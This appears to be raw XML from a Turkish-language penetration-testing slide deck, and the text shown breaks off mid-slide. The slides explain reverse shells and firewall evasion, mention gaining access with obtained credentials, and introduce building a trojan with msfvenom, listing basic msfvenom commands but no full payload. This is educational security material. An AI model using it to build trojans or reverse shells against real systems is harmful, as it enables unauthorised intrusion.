        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2015004"/>
            <a:ext cx="10515599" cy="4600109"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Dikdörtgen 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32AB862-4462-130E-D193-E17B16A643FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595718" y="5827059"/>
            <a:ext cx="4285129" cy="48409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36188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84CC8EA5-68FA-58D0-35E1-E8D47167030B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="11759"/>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863585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332C5A03-204A-C5AA-AB65-BDCEA6A8333F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="1951774"/>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A60E783E-A72B-2986-2F2C-CFA4E01E4ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1951773"/>
            <a:ext cx="12191999" cy="4763351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Dikdörtgen 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1892E678-3BA4-3D81-B49C-39252FD7E9AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="537882"/>
            <a:ext cx="2008094" cy="35858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Sağ Ok 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F8EC82D-A35E-C1A3-91FB-4CA71C831B2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2312894" y="3747247"/>
            <a:ext cx="1488141" cy="143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158560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ekran görüntüsü içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7325DB52-B7C4-08EF-0914-5E2F4A90C31D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="5529263" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Resim 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4780989B-9862-EAF8-9667-C7872C8BF414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5529262" y="0"/>
            <a:ext cx="6662737" cy="5943600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Metin kutusu 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12FD1013-8833-615F-E460-ECC9C256FD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5529262" y="5943600"/>
            <a:ext cx="6662738" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Elde edilen kullanıcı adı ve şifre bilgileri girilip sisteme erişim sağlanıyor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3205626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F08DB0-36FE-7F90-F9F3-0BBB3E214A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721609B5-4B5B-0680-0E8D-280415FE1AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shell karşı cihazdan bağlantı almak anlamına gelmektedir. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell ise ters bağlantıyı ifade etmektedir. Bazen hedef cihazlarımızda açık port ya da zafiyet bulamadığımız zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell almamız gerekir. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell’i biraz daha açıklayalım.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Güvenlik duvarları port bazlı kontrol yaparlar. İç ağdan 80, 443 portlarına izin verilmiş, dış ağdan gelen istekler kapatılmış olsun. Ama iç ağdan ilk bağlantı noktası 80 portundan başlatıldığı için cevaplar güvenlik duvarından geçmesine izin verilecektir. Bu güvenlik duvarının </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>statefull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> özelliğidir. Şu kısma dikkat çekmekte fayda var. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell dış ağdan bağlantı sağlamıyor öncelikle iç ağdan bir isteğin olması gerekir. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hackerlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> bu isteklerin gerçekleşmesi için e-mail, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phissing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sosyal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>müdendislik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> gibi yöntemlere başvururlar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3868305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DA15EF0-2962-F2CA-D1F6-AB9254F23BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="167640" y="346728"/>
            <a:ext cx="11855888" cy="6099792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1060013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352F57-BE88-5D82-71A4-F4ABB735D7D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trojen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> oluşturma.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB49490-2A53-5651-C8EA-F6C267E636AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sudo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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> komuta ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trojen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> yapmamıza yarayacak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tool’u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> açıyoruz. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> içinde barındırdığı modüller ile hedef sisteme sızmamıza yardımcı olur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfvenom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help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> komutunu yazdığımızda kullanılacak parametreleri ve kullanımlarını görebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> yazarak kullanılacak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(bağlantı türü) seçebiliriz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3300031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C1C787AD-5BA1-7E50-37F1-B64A2F780843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="25788"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="106580" y="529997"/>
            <a:ext cx="11827082" cy="6399627"/>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4" name="Dikdörtgen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEAAB157-D54C-0092-3216-7064A8FA47D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134743" y="1598255"/>
            <a:ext cx="9075233" cy="356839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Dikdörtgen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{344E6CE2-8A86-15DD-0119-696A82EC8BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479502" y="2170800"/>
            <a:ext cx="11454160" cy="25352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Dikdörtgen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D681CA3A-76DA-780C-2AA5-F4914A7F2D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479502" y="2424329"/>
            <a:ext cx="7136781" cy="3122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92D050"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Dikdörtgen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D1646A-F833-3F0E-6E3D-AEEF6942498E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479502" y="4070878"/>
            <a:ext cx="10504449" cy="2676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A160F275-0A95-55AB-7216-2A162697DA36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479502" y="4385377"/>
            <a:ext cx="8385717" cy="35683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B6EFA63D-93BE-3071-7E10-0C7839AEA4CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047013" y="685868"/>
            <a:ext cx="6886649" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> nedir? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracının bir alt türü olan başka bir araçtır. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
